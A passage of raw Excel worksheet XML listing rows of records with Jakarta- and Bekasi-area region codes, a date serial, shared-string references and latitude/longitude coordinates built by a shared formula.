      <c r="B902" s="1">
        <v>43883</v>
      </c>
      <c r="C902">
        <v>1</v>
      </c>
      <c r="D902" t="s">
        <v>22</v>
      </c>
      <c r="E902" t="s">
        <v>23</v>
      </c>
      <c r="F902" t="s">
        <v>3509</v>
      </c>
      <c r="G902" t="s">
        <v>3510</v>
      </c>
      <c r="H902" t="s">
        <v>26</v>
      </c>
      <c r="I902" t="s">
        <v>3481</v>
      </c>
      <c r="J902" t="s">
        <v>3511</v>
      </c>
      <c r="L902" t="s">
        <v>3512</v>
      </c>
      <c r="M902">
        <v>3175050002</v>
      </c>
      <c r="N902">
        <v>3175050</v>
      </c>
      <c r="O902">
        <v>3175</v>
      </c>
      <c r="P902">
        <v>31</v>
      </c>
      <c r="Q902" t="s">
        <v>1012</v>
      </c>
      <c r="R902" t="s">
        <v>1013</v>
      </c>
      <c r="S902" t="s">
        <v>547</v>
      </c>
      <c r="T902" t="s">
        <v>33</v>
      </c>
      <c r="U902" s="5">
        <v>10690864</v>
      </c>
      <c r="V902" s="5" t="s">
        <v>15291</v>
      </c>
      <c r="W902" s="5">
        <v>-617082</v>
      </c>
      <c r="X902" t="s">
        <v>19085</v>
      </c>
      <c r="Y902" t="str">
        <f t="shared" si="14"/>
        <v>-6.17082,106.90864</v>
      </c>
    </row>
    <row r="903" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A903">
        <v>108473</v>
      </c>
      <c r="B903" s="1">
        <v>43883</v>
      </c>
      <c r="C903">
        <v>1</v>
      </c>
      <c r="D903" t="s">
        <v>22</v>
      </c>
      <c r="E903" t="s">
        <v>23</v>
      </c>
      <c r="F903" t="s">
        <v>3513</v>
      </c>
      <c r="G903" t="s">
        <v>3514</v>
      </c>
      <c r="H903" t="s">
        <v>26</v>
      </c>
      <c r="I903" t="s">
        <v>166</v>
      </c>
      <c r="J903" t="s">
        <v>3515</v>
      </c>
      <c r="L903" t="s">
        <v>3516</v>
      </c>
      <c r="M903">
        <v>3172090004</v>
      </c>
      <c r="N903">
        <v>3172090</v>
      </c>
      <c r="O903">
        <v>3172</v>
      </c>
      <c r="P903">
        <v>31</v>
      </c>
      <c r="Q903" t="s">
        <v>889</v>
      </c>
      <c r="R903" t="s">
        <v>890</v>
      </c>
      <c r="S903" t="s">
        <v>49</v>
      </c>
      <c r="T903" t="s">
        <v>33</v>
      </c>
      <c r="U903" s="5">
        <v>10689043</v>
      </c>
      <c r="V903" s="5" t="s">
        <v>15292</v>
      </c>
      <c r="W903" s="5">
        <v>-620206</v>
      </c>
      <c r="X903" t="s">
        <v>19086</v>
      </c>
      <c r="Y903" t="str">
        <f t="shared" si="14"/>
        <v>-6.20206,106.89043</v>
      </c>
    </row>
    <row r="904" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A904">
        <v>108474</v>
      </c>
      <c r="B904" s="1">
        <v>43883</v>
      </c>
      <c r="C904">
        <v>1</v>
      </c>
      <c r="D904" t="s">
        <v>22</v>
      </c>
      <c r="E904" t="s">
        <v>23</v>
      </c>
      <c r="F904" t="s">
        <v>3517</v>
      </c>
      <c r="H904" t="s">
        <v>26</v>
      </c>
      <c r="I904" t="s">
        <v>197</v>
      </c>
      <c r="J904" t="s">
        <v>3518</v>
      </c>
      <c r="L904" t="s">
        <v>3519</v>
      </c>
      <c r="M904">
        <v>3175050002</v>
      </c>
      <c r="N904">
        <v>3175050</v>
      </c>
      <c r="O904">
        <v>3175</v>
      </c>
      <c r="P904">
        <v>31</v>
      </c>
      <c r="Q904" t="s">
        <v>1012</v>
      </c>
      <c r="R904" t="s">
        <v>1013</v>
      </c>
      <c r="S904" t="s">
        <v>547</v>
      </c>
      <c r="T904" t="s">
        <v>33</v>
      </c>
      <c r="U904" s="5">
        <v>10689713</v>
      </c>
      <c r="V904" s="5" t="s">
        <v>15293</v>
      </c>
      <c r="W904" s="5">
        <v>-617507</v>
      </c>
      <c r="X904" t="s">
        <v>19087</v>
      </c>
      <c r="Y904" t="str">
        <f t="shared" si="14"/>
        <v>-6.17507,106.89713</v>
      </c>
    </row>
    <row r="905" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A905">
        <v>108475</v>
      </c>
      <c r="B905" s="1">
        <v>43883</v>
      </c>
      <c r="C905">
        <v>1</v>
      </c>
      <c r="D905" t="s">
        <v>22</v>
      </c>
      <c r="E905" t="s">
        <v>23</v>
      </c>
      <c r="F905" t="s">
        <v>3520</v>
      </c>
      <c r="H905" t="s">
        <v>26</v>
      </c>
      <c r="I905" t="s">
        <v>1055</v>
      </c>
      <c r="J905" t="s">
        <v>3521</v>
      </c>
      <c r="L905" t="s">
        <v>3522</v>
      </c>
      <c r="M905">
        <v>3171100005</v>
      </c>
      <c r="N905">
        <v>3171100</v>
      </c>
      <c r="O905">
        <v>3171</v>
      </c>
      <c r="P905">
        <v>31</v>
      </c>
      <c r="Q905" t="s">
        <v>1630</v>
      </c>
      <c r="R905" t="s">
        <v>107</v>
      </c>
      <c r="S905" t="s">
        <v>108</v>
      </c>
      <c r="T905" t="s">
        <v>33</v>
      </c>
      <c r="U905" s="5">
        <v>10684222</v>
      </c>
      <c r="V905" s="5" t="s">
        <v>15294</v>
      </c>
      <c r="W905" s="5">
        <v>-622011</v>
      </c>
      <c r="X905" t="s">
        <v>19088</v>
      </c>
      <c r="Y905" t="str">
        <f t="shared" si="14"/>
        <v>-6.22011,106.84222</v>
      </c>
    </row>
    <row r="906" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A906">
        <v>108476</v>
      </c>
      <c r="B906" s="1">
        <v>43883</v>
      </c>
      <c r="C906">
        <v>1</v>
      </c>
      <c r="D906" t="s">
        <v>22</v>
      </c>
      <c r="E906" t="s">
        <v>23</v>
      </c>
      <c r="F906" t="s">
        <v>3523</v>
      </c>
      <c r="G906" t="s">
        <v>3524</v>
      </c>
      <c r="H906" t="s">
        <v>26</v>
      </c>
      <c r="I906" t="s">
        <v>111</v>
      </c>
      <c r="J906" t="s">
        <v>2627</v>
      </c>
      <c r="L906" t="s">
        <v>3525</v>
      </c>
      <c r="M906">
        <v>3275060005</v>
      </c>
      <c r="N906">
        <v>3275060</v>
      </c>
      <c r="O906">
        <v>3275</v>
      </c>
      <c r="P906">
        <v>32</v>
      </c>
      <c r="Q906" t="s">
        <v>3526</v>
      </c>
      <c r="R906" t="s">
        <v>114</v>
      </c>
      <c r="S906" t="s">
        <v>41</v>
      </c>
      <c r="T906" t="s">
        <v>42</v>
      </c>
      <c r="U906" s="5">
        <v>10695880</v>
      </c>
      <c r="V906" s="5" t="s">
        <v>15295</v>
      </c>
      <c r="W906" s="5">
        <v>-621707</v>
      </c>
      <c r="X906" t="s">
        <v>19089</v>
      </c>
      <c r="Y906" t="str">
        <f t="shared" si="14"/>
        <v>-6.21707,106.95880</v>
      </c>
    </row>
    <row r="907" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A907">
        <v>108477</v>
      </c>
      <c r="B907" s="1">
        <v>43883</v>
      </c>
      <c r="C907">
        <v>1</v>
      </c>
      <c r="D907" t="s">
        <v>22</v>
      </c>
      <c r="E907" t="s">
        <v>23</v>
      </c>
      <c r="F907" t="s">
        <v>3527</v>
      </c>
      <c r="H907" t="s">
        <v>26</v>
      </c>
      <c r="I907" t="s">
        <v>893</v>
      </c>
      <c r="J907" t="s">
        <v>2627</v>
      </c>
      <c r="L907" t="s">
        <v>3528</v>
      </c>
      <c r="M907">
        <v>3275061004</v>
      </c>
      <c r="N907">
        <v>3275061</v>
      </c>
      <c r="O907">
        <v>3275</v>
      </c>
      <c r="P907">
        <v>32</v>
      </c>
      <c r="Q907" t="s">
        <v>39</v>
      </c>
      <c r="R907" t="s">
        <v>40</v>
      </c>
      <c r="S907" t="s">
        <v>41</v>
      </c>
      <c r="T907" t="s">
        <v>42</v>
      </c>
      <c r="U907" s="5">
        <v>10699574</v>
      </c>
      <c r="V907" s="5" t="s">
        <v>15296</v>
      </c>
      <c r="W907" s="5">
        <v>-617362</v>
      </c>
      <c r="X907" t="s">
        <v>19090</v>
      </c>
      <c r="Y907" t="str">
        <f t="shared" si="14"/>
        <v>-6.17362,106.99574</v>
      </c>
    </row>
    <row r="908" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A908">
        <v>108478</v>
      </c>
      <c r="B908" s="1">
        <v>43883</v>
      </c>
      <c r="C908">
        <v>1</v>
      </c>
      <c r="D908" t="s">
        <v>22</v>
      </c>
      <c r="E908" t="s">
        <v>23</v>
      </c>
      <c r="F908" t="s">
        <v>3529</v>
      </c>
      <c r="G908" t="s">
        <v>3530</v>
      </c>
      <c r="H908" t="s">
        <v>26</v>
      </c>
      <c r="I908" t="s">
        <v>1359</v>
      </c>
      <c r="J908" t="s">
        <v>3531</v>
      </c>
      <c r="L908" t="s">
        <v>3532</v>
      </c>
      <c r="M908">
        <v>3172090005</v>
      </c>
      <c r="N908">
        <v>3172090</v>
      </c>
      <c r="O908">
        <v>3172</v>
      </c>
      <c r="P908">
        <v>31</v>
      </c>
      <c r="Q908" t="s">
        <v>2749</v>
      </c>
      <c r="R908" t="s">
        <v>890</v>
      </c>
      <c r="S908" t="s">
        <v>49</v>
      </c>
      <c r="T908" t="s">
        <v>33</v>
      </c>
      <c r="U908" s="5">
        <v>10687770</v>
      </c>
      <c r="V908" s="5" t="s">
        <v>15297</v>
      </c>
      <c r="W908" s="5">
        <v>-619195</v>
      </c>
      <c r="X908" t="s">
        <v>19091</v>
      </c>
      <c r="Y908" t="str">
        <f t="shared" si="14"/>
        <v>-6.19195,106.87770</v>
      </c>
    </row>
    <row r="909" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A909">
        <v>108479</v>
      </c>
      <c r="B909" s="1">
        <v>43883</v>
      </c>
      <c r="C909">
        <v>1</v>
      </c>
      <c r="D909" t="s">
        <v>22</v>
      </c>
      <c r="E909" t="s">
        <v>23</v>
      </c>
      <c r="F909" t="s">
        <v>3533</v>
      </c>
      <c r="H909" t="s">
        <v>26</v>
      </c>
      <c r="I909" t="s">
        <v>386</v>
      </c>
      <c r="J909" t="s">
        <v>2627</v>
      </c>
      <c r="L909" t="s">
        <v>3534</v>
      </c>
      <c r="M909">
        <v>3275070002</v>
      </c>
      <c r="N909">
        <v>3275070</v>
      </c>
      <c r="O909">
        <v>3275</v>
      </c>
      <c r="P909">
        <v>32</v>
      </c>
      <c r="Q909" t="s">
        <v>3309</v>
      </c>
      <c r="R909" t="s">
        <v>3310</v>
      </c>
      <c r="S909" t="s">
        <v>41</v>
      </c>
      <c r="T909" t="s">
        <v>42</v>
      </c>
      <c r="U909" s="5">
        <v>10700278</v>
      </c>
      <c r="V909" s="5" t="s">
        <v>15298</v>
      </c>
      <c r="W909" s="5">
        <v>-617349</v>
      </c>
      <c r="X909" t="s">
        <v>19092</v>
      </c>
      <c r="Y909" t="str">
        <f t="shared" si="14"/>
        <v>-6.17349,107.00278</v>
      </c>
    </row>
    <row r="910" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A910">
        <v>108480</v>
      </c>
      <c r="B910" s="1">
        <v>43883</v>
      </c>
      <c r="C910">
        <v>1</v>
      </c>
      <c r="D910" t="s">
        <v>22</v>
      </c>
      <c r="E910" t="s">
        <v>23</v>
      </c>
      <c r="F910" t="s">
        <v>3535</v>
      </c>
      <c r="G910" t="s">
        <v>3536</v>
      </c>
      <c r="H910" t="s">
        <v>26</v>
      </c>
      <c r="I910" t="s">
        <v>27</v>
      </c>
      <c r="J910" t="s">
        <v>2747</v>
      </c>
      <c r="L910" t="s">
        <v>3537</v>
      </c>
      <c r="M910">
        <v>3172090005</v>
      </c>
      <c r="N910">
        <v>3172090</v>
      </c>
      <c r="O910">
        <v>3172</v>
      </c>
      <c r="P910">
        <v>31</v>
      </c>
      <c r="Q910" t="s">
        <v>2749</v>
      </c>
      <c r="R910" t="s">
        <v>890</v>
      </c>
      <c r="S910" t="s">
        <v>49</v>
      </c>
      <c r="T910" t="s">
        <v>33</v>
      </c>
      <c r="U910" s="5">
        <v>10687844</v>
      </c>
      <c r="V910" s="5" t="s">
        <v>15299</v>
      </c>
      <c r="W910" s="5">
        <v>-619291</v>
      </c>
      <c r="X910" t="s">
        <v>19093</v>
      </c>
      <c r="Y910" t="str">
        <f t="shared" si="14"/>
        <v>-6.19291,106.87844</v>
      </c>
    </row>
    <row r="911" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A911">
        <v>108481</v>
      </c>
      <c r="B911" s="1">
        <v>43883</v>
      </c>
      <c r="C911">
        <v>1</v>
      </c>
      <c r="D911" t="s">
        <v>22</v>
      </c>
      <c r="E911" t="s">
        <v>23</v>
      </c>
      <c r="F911" t="s">
        <v>3538</v>
      </c>
      <c r="G911" t="s">
        <v>3539</v>
      </c>
      <c r="H911" t="s">
        <v>26</v>
      </c>
      <c r="I911" t="s">
        <v>1809</v>
      </c>
      <c r="J911" t="s">
        <v>2747</v>
      </c>
      <c r="M911">
        <v>3172090005</v>
      </c>
      <c r="N911">
        <v>3172090</v>
      </c>
      <c r="O911">
        <v>3172</v>
      </c>
      <c r="P911">
        <v>31</v>
      </c>
      <c r="Q911" t="s">
        <v>2749</v>
      </c>
      <c r="R911" t="s">
        <v>890</v>
      </c>
      <c r="S911" t="s">
        <v>49</v>
      </c>
      <c r="T911" t="s">
        <v>33</v>
      </c>
      <c r="U911" s="5">
        <v>10687578</v>
      </c>
      <c r="V911" s="5" t="s">
        <v>15300</v>
      </c>
      <c r="W911" s="5">
        <v>-619452</v>
      </c>
      <c r="X911" t="s">
        <v>19094</v>
      </c>
      <c r="Y911" t="str">
        <f t="shared" si="14"/>
        <v>-6.19452,106.87578</v>
      </c>
    </row>
    <row r="912" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A912">
        <v>108482</v>
      </c>
      <c r="B912" s="1">
        <v>43883</v>
      </c>
      <c r="C912">
        <v>1</v>
      </c>
      <c r="D912" t="s">
        <v>22</v>
      </c>
      <c r="E912" t="s">
        <v>23</v>
      </c>
      <c r="F912" t="s">
        <v>3540</v>
      </c>
      <c r="G912" t="s">
        <v>3541</v>
      </c>
      <c r="H912" t="s">
        <v>26</v>
      </c>
      <c r="I912" t="s">
        <v>974</v>
      </c>
      <c r="J912" t="s">
        <v>3542</v>
      </c>
      <c r="L912" t="s">
        <v>3543</v>
      </c>
      <c r="M912">
        <v>3172080003</v>
      </c>
      <c r="N912">
        <v>3172080</v>
      </c>
      <c r="O912">
        <v>3172</v>
      </c>
      <c r="P912">
        <v>31</v>
      </c>
      <c r="Q912" t="s">
        <v>2250</v>
      </c>
      <c r="R912" t="s">
        <v>141</v>
      </c>
      <c r="S912" t="s">
        <v>49</v>
      </c>
      <c r="T912" t="s">
        <v>33</v>
      </c>
      <c r="U912" s="5">
        <v>10694933</v>
      </c>
      <c r="V912" s="5" t="s">
        <v>15301</v>
      </c>
      <c r="W912" s="5">
        <v>-619995</v>
      </c>
      <c r="X912" t="s">
        <v>19095</v>
      </c>
      <c r="Y912" t="str">
        <f t="shared" si="14"/>
        <v>-6.19995,106.94933</v>
      </c>
    </row>
    <row r="913" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A913">
        <v>108483</v>
      </c>
      <c r="B913" s="1">
        <v>43883</v>
      </c>
      <c r="C913">
        <v>1</v>
      </c>
      <c r="D913" t="s">
        <v>22</v>
      </c>
      <c r="E913" t="s">
        <v>23</v>
      </c>
      <c r="F913" t="s">
        <v>3544</v>
      </c>
      <c r="H913" t="s">
        <v>26</v>
      </c>
      <c r="I913" t="s">
        <v>2196</v>
      </c>
      <c r="J913" t="s">
        <v>2627</v>
      </c>
      <c r="L913" t="s">
        <v>3545</v>
      </c>
      <c r="M913">
        <v>3275010010</v>
      </c>
      <c r="N913">
        <v>3275010</v>
      </c>
      <c r="O913">
        <v>3275</v>
      </c>
      <c r="P913">
        <v>32</v>
      </c>
      <c r="Q913" t="s">
        <v>286</v>
      </c>
      <c r="R913" t="s">
        <v>287</v>
      </c>
      <c r="S913" t="s">
        <v>41</v>
      </c>
      <c r="T913" t="s">
        <v>42</v>
      </c>
      <c r="U913" s="5">
        <v>10694625</v>
      </c>
      <c r="V913" s="5" t="s">
        <v>15302</v>
      </c>
      <c r="W913" s="5">
        <v>-626935</v>
      </c>
      <c r="X913" t="s">
        <v>19096</v>
      </c>
      <c r="Y913" t="str">
        <f t="shared" si="14"/>
        <v>-6.26935,106.94625</v>
      </c>
    </row>
    <row r="914" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A914">
        <v>108484</v>
      </c>
      <c r="B914" s="1">
        <v>43883</v>
      </c>
      <c r="C914">
        <v>1</v>
      </c>
      <c r="D914" t="s">
        <v>22</v>
      </c>
      <c r="E914" t="s">
        <v>23</v>
      </c>
      <c r="F914" t="s">
        <v>3546</v>
      </c>
      <c r="G914" t="s">
        <v>3547</v>
      </c>
      <c r="H914" t="s">
        <v>26</v>
      </c>
      <c r="I914" t="s">
        <v>838</v>
      </c>
      <c r="J914" t="s">
        <v>3548</v>
      </c>
      <c r="L914" t="s">
        <v>3549</v>
      </c>
      <c r="M914">
        <v>3173020001</v>
      </c>
      <c r="N914">
        <v>3173020</v>
      </c>
      <c r="O914">
        <v>3173</v>
      </c>
      <c r="P914">
        <v>31</v>
      </c>
      <c r="Q914" t="s">
        <v>179</v>
      </c>
      <c r="R914" t="s">
        <v>179</v>
      </c>
      <c r="S914" t="s">
        <v>62</v>
      </c>
      <c r="T914" t="s">
        <v>33</v>
      </c>
      <c r="U914" s="5">
        <v>10684447</v>
      </c>
      <c r="V914" s="5" t="s">
        <v>15303</v>
      </c>
      <c r="W914" s="5">
        <v>-620483</v>
      </c>
      <c r="X914" t="s">
        <v>19097</v>
      </c>
      <c r="Y914" t="str">
        <f t="shared" si="14"/>
        <v>-6.20483,106.84447</v>
      </c>
    </row>
    <row r="915" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A915">
        <v>108485</v>
      </c>
      <c r="B915" s="1">
        <v>43883</v>
      </c>
      <c r="C915">
        <v>1</v>
      </c>
      <c r="D915" t="s">
        <v>22</v>
      </c>
      <c r="E915" t="s">
        <v>23</v>
      </c>
      <c r="F915" t="s">
        <v>3550</v>
      </c>
      <c r="H915" t="s">
        <v>26</v>
      </c>
      <c r="I915" t="s">
        <v>1633</v>
      </c>
      <c r="J915" t="s">
        <v>2627</v>
      </c>
      <c r="L915" t="s">
        <v>2794</v>
      </c>
      <c r="M915">
        <v>3275040007</v>
      </c>
      <c r="N915">
        <v>3275040</v>
      </c>
      <c r="O915">
        <v>3275</v>
      </c>
      <c r="P915">
        <v>32</v>
      </c>
      <c r="Q915" t="s">
        <v>99</v>
      </c>
      <c r="R915" t="s">
        <v>100</v>
      </c>
      <c r="S915" t="s">
        <v>41</v>
      </c>
      <c r="T915" t="s">
        <v>42</v>
      </c>
      <c r="U915" s="5">
        <v>10702586</v>
      </c>
      <c r="V915" s="5" t="s">
        <v>15304</v>
      </c>
      <c r="W915" s="5">
        <v>-622917</v>
      </c>
      <c r="X915" t="s">
        <v>19098</v>
      </c>
      <c r="Y915" t="str">
        <f t="shared" si="14"/>
        <v>-6.22917,107.02586</v>
      </c>
    </row>
    <row r="916" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A916">
        <v>108486</v>
      </c>
      <c r="B916" s="1">
        <v>43883</v>
      </c>
      <c r="C916">
        <v>1</v>
      </c>
      <c r="D916" t="s">
        <v>22</v>
      </c>
      <c r="E916" t="s">
        <v>23</v>
      </c>
      <c r="F916" t="s">
        <v>3551</v>
      </c>
      <c r="H916" t="s">
        <v>26</v>
      </c>
      <c r="I916" t="s">
        <v>1447</v>
      </c>
      <c r="J916" t="s">
        <v>3552</v>
      </c>
      <c r="L916" t="s">
        <v>3553</v>
      </c>
      <c r="M916">
        <v>3172080005</v>
      </c>
      <c r="N916">
        <v>3172080</v>
      </c>
      <c r="O916">
        <v>3172</v>
      </c>
      <c r="P916">
        <v>31</v>
      </c>
      <c r="Q916" t="s">
        <v>140</v>
      </c>
      <c r="R916" t="s">
        <v>141</v>
      </c>
      <c r="S916" t="s">
        <v>49</v>
      </c>
      <c r="T916" t="s">
        <v>33</v>
      </c>
      <c r="U916" s="5">
        <v>10694571</v>
      </c>
      <c r="V916" s="5" t="s">
        <v>15305</v>
      </c>
      <c r="W916" s="5">
        <v>-617875</v>
      </c>
      <c r="X916" t="s">
        <v>19099</v>
      </c>
      <c r="Y916" t="str">
        <f t="shared" si="14"/>
        <v>-6.17875,106.94571</v>
      </c>
    </row>
    <row r="917" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A917">
        <v>108487</v>
      </c>
      <c r="B917" s="1">
        <v>43883</v>
      </c>
      <c r="C917">
        <v>1</v>
      </c>
      <c r="D917" t="s">
        <v>22</v>
      </c>
      <c r="E917" t="s">
        <v>23</v>
      </c>
      <c r="F917" t="s">
        <v>3554</v>
      </c>
      <c r="G917" t="s">
        <v>3555</v>
      </c>
      <c r="H917" t="s">
        <v>26</v>
      </c>
      <c r="I917" t="s">
        <v>1651</v>
      </c>
      <c r="J917" t="s">
        <v>3066</v>
      </c>
      <c r="L917" t="s">
        <v>3556</v>
      </c>
      <c r="M917">
        <v>3173020001</v>
      </c>
      <c r="N917">
        <v>3173020</v>
      </c>
      <c r="O917">
        <v>3173</v>
      </c>
      <c r="P917">
        <v>31</v>
      </c>
      <c r="Q917" t="s">
        <v>179</v>
      </c>
      <c r="R917" t="s">
        <v>179</v>
      </c>
      <c r="S917" t="s">
        <v>62</v>
      </c>
      <c r="T917" t="s">
        <v>33</v>
      </c>
      <c r="U917" s="5">
        <v>10683408</v>
      </c>
      <c r="V917" s="5" t="s">
        <v>15222</v>
      </c>
      <c r="W917" s="5">
        <v>-619876</v>
      </c>
      <c r="X917" t="s">
        <v>19012</v>
      </c>
      <c r="Y917" t="str">
        <f t="shared" si="14"/>
        <v>-6.19876,106.83408</v>
      </c>
    </row>
    <row r="918" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A918">
        <v>108488</v>
      </c>
      <c r="B918" s="1">
        <v>43883</v>
      </c>
      <c r="C918">
        <v>1</v>
      </c>
      <c r="D918" t="s">
        <v>22</v>
      </c>
      <c r="E918" t="s">
        <v>23</v>
      </c>
      <c r="F918" t="s">
        <v>3557</v>
      </c>
      <c r="G918" t="s">
        <v>3558</v>
      </c>
      <c r="H918" t="s">
        <v>26</v>
      </c>
      <c r="I918" t="s">
        <v>1824</v>
      </c>
      <c r="J918" t="s">
        <v>3559</v>
      </c>
      <c r="L918" t="s">
        <v>3560</v>
      </c>
      <c r="M918">
        <v>3175060001</v>
      </c>
      <c r="N918">
        <v>3175060</v>
      </c>
      <c r="O918">
        <v>3175</v>
      </c>
      <c r="P918">
        <v>31</v>
      </c>
      <c r="Q918" t="s">
        <v>2278</v>
      </c>
      <c r="R918" t="s">
        <v>2279</v>
      </c>
      <c r="S918" t="s">
        <v>547</v>
      </c>
      <c r="T918" t="s">
        <v>33</v>
      </c>
      <c r="U918" s="5">
        <v>10692182</v>
      </c>
      <c r="V918" s="5" t="s">
        <v>15306</v>
      </c>
      <c r="W918" s="5">
        <v>-615672</v>
      </c>
      <c r="X918" t="s">
        <v>19100</v>
      </c>
      <c r="Y918" t="str">
        <f t="shared" si="14"/>
        <v>-6.15672,106.92182</v>
      </c>
    </row>
    <row r="919" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A919">
        <v>108489</v>
      </c>
      <c r="B919" s="1">
        <v>43883</v>
      </c>
      <c r="C919">
        <v>1</v>
      </c>
      <c r="D919" t="s">
        <v>22</v>
      </c>
      <c r="E919" t="s">
        <v>23</v>
      </c>
      <c r="F919" t="s">
        <v>3561</v>
      </c>
      <c r="H919" t="s">
        <v>26</v>
      </c>
      <c r="I919" t="s">
        <v>2962</v>
      </c>
      <c r="J919" t="s">
        <v>3562</v>
      </c>
      <c r="L919" t="s">
        <v>3563</v>
      </c>
      <c r="M919">
        <v>3172080007</v>
      </c>
      <c r="N919">
        <v>3172080</v>
      </c>
      <c r="O919">
        <v>3172</v>
      </c>
      <c r="P919">
        <v>31</v>
      </c>
      <c r="Q919" t="s">
        <v>2307</v>
      </c>
      <c r="R919" t="s">
        <v>141</v>
      </c>
      <c r="S919" t="s">
        <v>49</v>
      </c>
      <c r="T919" t="s">
        <v>33</v>
      </c>
      <c r="U919" s="5">
        <v>10692016</v>
      </c>
      <c r="V919" s="5" t="s">
        <v>15307</v>
      </c>
      <c r="W919" s="5">
        <v>-618856</v>
      </c>
      <c r="X919" t="s">
        <v>19101</v>
      </c>
      <c r="Y919" t="str">
        <f t="shared" si="14"/>
        <v>-6.18856,106.92016</v>
      </c>
    </row>
    <row r="920" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A920">
        <v>108490</v>
      </c>
      <c r="B920" s="1">
        <v>43883</v>
      </c>
      <c r="C920">
        <v>1</v>
      </c>
      <c r="D920" t="s">
        <v>22</v>
      </c>
      <c r="E920" t="s">
        <v>23</v>
      </c>
      <c r="F920" t="s">
        <v>3564</v>
      </c>
      <c r="H920" t="s">
        <v>26</v>
      </c>
      <c r="I920" t="s">
        <v>271</v>
      </c>
      <c r="J920" t="s">
        <v>1711</v>
      </c>
      <c r="L920" t="s">
        <v>3565</v>
      </c>
      <c r="M920">
        <v>3175050001</v>
      </c>
      <c r="N920">
        <v>3175050</v>
      </c>
      <c r="O920">
        <v>3175</v>
      </c>
      <c r="P920">
        <v>31</v>
      </c>
      <c r="Q920" t="s">
        <v>1037</v>
      </c>
      <c r="R920" t="s">
        <v>1013</v>
      </c>
      <c r="S920" t="s">
        <v>547</v>
      </c>
      <c r="T920" t="s">
        <v>33</v>
      </c>
      <c r="U920" s="5">
        <v>10690678</v>
      </c>
      <c r="V920" s="5" t="s">
        <v>15308</v>
      </c>
      <c r="W920" s="5">
        <v>-614589</v>
      </c>
      <c r="X920" t="s">
        <v>19102</v>
      </c>
      <c r="Y920" t="str">
        <f t="shared" si="14"/>
        <v>-6.14589,106.90678</v>
      </c>
    </row>
    <row r="921" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A921">
        <v>108491</v>
      </c>
      <c r="B921" s="1">
        <v>43883</v>
      </c>
      <c r="C921">
        <v>1</v>
      </c>
      <c r="D921" t="s">
        <v>22</v>
      </c>
      <c r="E921" t="s">
        <v>23</v>
      </c>
      <c r="F921" t="s">
        <v>3566</v>
      </c>
      <c r="G921" t="s">
        <v>3567</v>
      </c>
      <c r="H921" t="s">
        <v>26</v>
      </c>
      <c r="I921" t="s">
        <v>354</v>
      </c>
      <c r="J921" t="s">
        <v>2356</v>
      </c>
      <c r="M921">
        <v>3173050002</v>
      </c>
      <c r="N921">
        <v>3173050</v>
      </c>
      <c r="O921">
        <v>3173</v>
      </c>
      <c r="P921">
        <v>31</v>
      </c>
      <c r="Q921" t="s">
        <v>588</v>
      </c>
      <c r="R921" t="s">
        <v>589</v>
      </c>
      <c r="S921" t="s">
        <v>62</v>
      </c>
      <c r="T921" t="s">
        <v>33</v>
      </c>
      <c r="U921" s="5">
        <v>10686992</v>
      </c>
      <c r="V921" s="5" t="s">
        <v>15309</v>
      </c>
      <c r="W921" s="5">
        <v>-617334</v>
      </c>
      <c r="X921" t="s">
        <v>18366</v>
      </c>
      <c r="Y921" t="str">
        <f t="shared" si="14"/>
        <v>-6.17334,106.86992</v>
      </c>
    </row>
    <row r="922" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A922">
        <v>108492</v>
      </c>
      <c r="B922" s="1">
        <v>43883</v>
      </c>
      <c r="C922">
        <v>1</v>
      </c>
      <c r="D922" t="s">
        <v>22</v>
      </c>
      <c r="E922" t="s">
        <v>23</v>
      </c>
      <c r="F922" t="s">
        <v>3568</v>
      </c>
      <c r="G922" t="s">
        <v>3569</v>
      </c>
      <c r="H922" t="s">
        <v>26</v>
      </c>
      <c r="I922" t="s">
        <v>72</v>
      </c>
      <c r="J922" t="s">
        <v>1745</v>
      </c>
      <c r="L922" t="s">
        <v>3570</v>
      </c>
      <c r="M922">
        <v>3175050003</v>
      </c>
      <c r="N922">
        <v>3175050</v>
      </c>
      <c r="O922">
        <v>3175</v>
      </c>
      <c r="P922">
        <v>31</v>
      </c>
      <c r="Q922" t="s">
        <v>1740</v>
      </c>
      <c r="R922" t="s">
        <v>1013</v>
      </c>
      <c r="S922" t="s">
        <v>547</v>
      </c>
      <c r="T922" t="s">
        <v>33</v>
      </c>
      <c r="U922" s="5">
        <v>10691111</v>
      </c>
      <c r="V922" s="5" t="s">
        <v>15310</v>
      </c>
      <c r="W922" s="5">
        <v>-616019</v>
      </c>
      <c r="X922" t="s">
        <v>19103</v>
      </c>
      <c r="Y922" t="str">
        <f t="shared" si="14"/>
        <v>-6.16019,106.91111</v>
      </c>
    </row>
    <row r="923" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A923">
        <v>108493</v>
      </c>
      <c r="B923" s="1">
        <v>43883</v>
      </c>
      <c r="C923">
        <v>1</v>
      </c>
      <c r="D923" t="s">
        <v>22</v>
      </c>
      <c r="E923" t="s">
        <v>23</v>
      </c>
      <c r="F923" t="s">
        <v>3571</v>
      </c>
      <c r="H923" t="s">
        <v>26</v>
      </c>
      <c r="I923" t="s">
        <v>290</v>
      </c>
      <c r="J923" t="s">
        <v>3501</v>
      </c>
      <c r="L923" t="s">
        <v>3572</v>
      </c>
      <c r="M923">
        <v>3175060001</v>
      </c>
      <c r="N923">
        <v>3175060</v>
      </c>
      <c r="O923">
        <v>3175</v>
      </c>
      <c r="P923">
        <v>31</v>
      </c>
      <c r="Q923" t="s">
        <v>2278</v>
      </c>
      <c r="R923" t="s">
        <v>2279</v>
      </c>
      <c r="S923" t="s">
        <v>547</v>
      </c>
